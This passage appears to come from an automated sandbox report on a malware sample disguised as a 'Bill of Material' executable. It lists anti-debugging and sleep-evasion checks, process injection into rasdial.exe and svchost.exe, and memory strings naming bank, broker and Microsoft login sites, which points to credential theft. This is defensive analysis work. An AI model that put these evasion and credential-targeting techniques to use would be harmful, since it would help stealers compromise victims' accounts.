            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392Thread sleep time: -8676000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392Thread sleep count: 5635 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392Thread sleep time: -11270000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588Thread sleep time: -54000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe TID: 5588Thread sleep time: -41000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0039DBBE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0036C2A2 FindFirstFileExW,0_2_0036C2A2
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A68EE FindFirstFileW,FindClose,0_2_003A68EE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_003A698F
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D076
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0039D3A9
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A9642
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A979D
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_003A9B2B
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_003A5C97
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0081C420 FindFirstFileW,FindNextFileW,FindClose,6_2_0081C420
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EU WestVMware20,11696487552n
            Source: A7b2-53.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: A7b2-53.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: soft.com/profileVMware20,1169648
            Source: A7b2-53.6.drBinary or memory string: discord.comVMware20,11696487552f
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware2qQ
            Source: A7b2-53.6.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696487552|UE
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ve Brokers - HKVMware20,11696487
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs.co.inVMware20,11696487552~
            Source: A7b2-53.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: A7b2-53.6.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: A7b2-53.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: A7b2-53.6.drBinary or memory string: global block list test formVMware20,11696487552
            Source: A7b2-53.6.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,11696487552t
            Source: A7b2-53.6.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2820746689.0000020B23AAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: A7b2-53.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: A7b2-53.6.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: A7b2-53.6.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: A7b2-53.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: A7b2-53.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4649558297.00000000012BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
            Source: A7b2-53.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: A7b2-53.6.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: A7b2-53.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: A7b2-53.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: rasdial.exe, 00000006.00000002.4655489045.0000000007A67000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,1169648
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: A7b2-53.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: A7b2-53.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: A7b2-53.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: A7b2-53.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: A7b2-53.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: A7b2-53.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004174F3 LdrLoadDll,2_2_004174F3
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003AEAA2 BlockInput,0_2_003AEAA2
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00362622
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00354CE8 mov eax, dword ptr fs:[00000030h]0_2_00354CE8
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_01383480 mov eax, dword ptr fs:[00000030h]0_2_01383480
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_013834E0 mov eax, dword ptr fs:[00000030h]0_2_013834E0
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_01381E70 mov eax, dword ptr fs:[00000030h]0_2_01381E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]2_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]2_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]2_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
